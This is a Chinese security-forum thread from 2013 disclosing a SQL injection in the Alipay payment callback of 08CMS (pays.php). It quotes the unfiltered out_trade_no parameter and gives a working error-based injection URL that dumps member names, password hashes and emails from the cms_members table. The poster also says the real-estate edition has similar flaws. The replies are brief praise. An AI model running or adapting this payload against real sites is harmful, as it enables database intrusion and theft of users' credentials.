查看: 24448|回复: 22

【原创】 08CMS 注入

[复制链接]
匿名
匿名  发表于 2013-8-30 21:27:44 |阅读模式
本帖最后由 匿名 于 2013-8-31 21:28 编辑

发个注入。。。

汽车的:

/include/paygate/alipay/pays.php

[PHP] 纯文本查看 复制代码
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
/*
 *类名:alipay_notify
 *功能:付款过程中服务器通知类
 *详细:该页面是通知返回核心处理文件,不需要修改
 *版本:3.1
 *修改日期:2010-10-29
 '说明:
 '以下代码只是为了方便商户测试而提供的样例代码,商户可以根据自己网站的需要,按照技术文档编写,并非一定要使用该代码。
 '该代码仅供学习和研究支付宝接口使用,只是提供一个参考。
*/
 
require_once("class/alipay_notify.php");
empty($_POST) && $_POST = &$_GET;
require_once('../pay_base.php');  包含巍峨
$pay = new pay_base('alipay');  // 实例化
$pay->by = 'pays'; //我们看看里面是咋写的
$pay->order_sn = $_POST['out_trade_no']; //看看这里 没过滤就带进去了
if(!$pay->getData()){                        //     获取数据                
    //log_result ("order_failed");
    exit("fail");
}
........
 
    function getData(){
            .........
         
switch($this->by){
        case 'pays':
            $sql1 = "SELECT pid as order_id,mid,amount as totalfee FROM {$tblprefix}pays WHERE ordersn='$this->order_sn'"; 在这里来了
            $this->status = 0;
            break;
      .......................................
        if($sql1 && $tmp = $db->fetch_one($sql1)){ //         注入
            if(empty($key) || empty($tmp[$key]) || empty($sql2)){



Exp
[PHP] 纯文本查看 复制代码
1
/include/paygate/alipay/pays.php?out_trade_no=22'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20concat(0x3a,mname,0x3a,password,0x3a,email,0x3a)%20from%20cms_members%20limit%200,1),FLOOR(RAND(0)*2))X%20FROM%20information_schema.tables%20GROUP%20BY%20X)a)%20AND'




我也是小菜 。。。
高版本是默认错误信息对admin显示的 低版本可以的
房产系统也是一样的  目录下还有差不多的代码 这个系统还有很多问题的比如变量问题.... 大家自己去看看~
212454mmaumut0tdma6j6e.jpg

点评

我去 这尼玛 这种低级错误也犯! post数据都不处理!  发表于 2013-9-1 23:32
回复

举报

  • TA的每日心情

    2020-12-4 20:42
  • 签到天数: 23 天

    [LV.4]偶尔看看III

    发表于 2013-8-30 21:41:59 | 显示全部楼层
    前排支持大牛。。 LZ 代码审计牛。。。。
    回复 支持 反对

    举报

  • TA的每日心情
    无聊
    2015-9-12 11:20
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2013-8-30 21:50:01 | 显示全部楼层
    考 传说中的二楼 哈哈
    回复 支持 反对

    举报

  • TA的每日心情

    2021-9-9 23:35
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2013-8-30 21:53:27 | 显示全部楼层
    匿名发布{:soso_e179:}
    回复 支持 反对

    举报

  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2013-8-30 21:54:40 | 显示全部楼层
    一看帖子就知道是IL大牛发的了 膜拜

    点评

    到外面首頁四格那裡按右邊作者名稱那裡就知道了 是IL沒錯  发表于 2013-8-31 01:10
    你知道的太多了  详情 回复 发表于 2013-8-31 00:21
    回复 支持 反对

    举报

  • TA的每日心情
    慵懒
    2016-12-9 22:01
  • 签到天数: 77 天

    [LV.6]常住居民II

    发表于 2013-8-30 22:11:21 | 显示全部楼层
    膜拜大牛、随便学习学习
    回复 支持 反对

    举报

    该用户从未签到

    发表于 2013-8-30 22:15:13 | 显示全部楼层
    我来晚了,继续支持
    回复 支持 反对

    举报

    头像被屏蔽

    该用户从未签到

    发表于 2013-8-30 22:37:50 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    举报

    xiaolingluan 该用户已被删除
    发表于 2013-8-30 23:40:35 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    举报

    头像被屏蔽
  • TA的每日心情
    擦汗
    2015-6-4 18:01
  • 签到天数: 8 天

    [LV.3]偶尔看看II

    发表于 2013-8-31 00:19:41 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2025-1-1 23:17 , Processed in 0.066765 second(s), 20 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.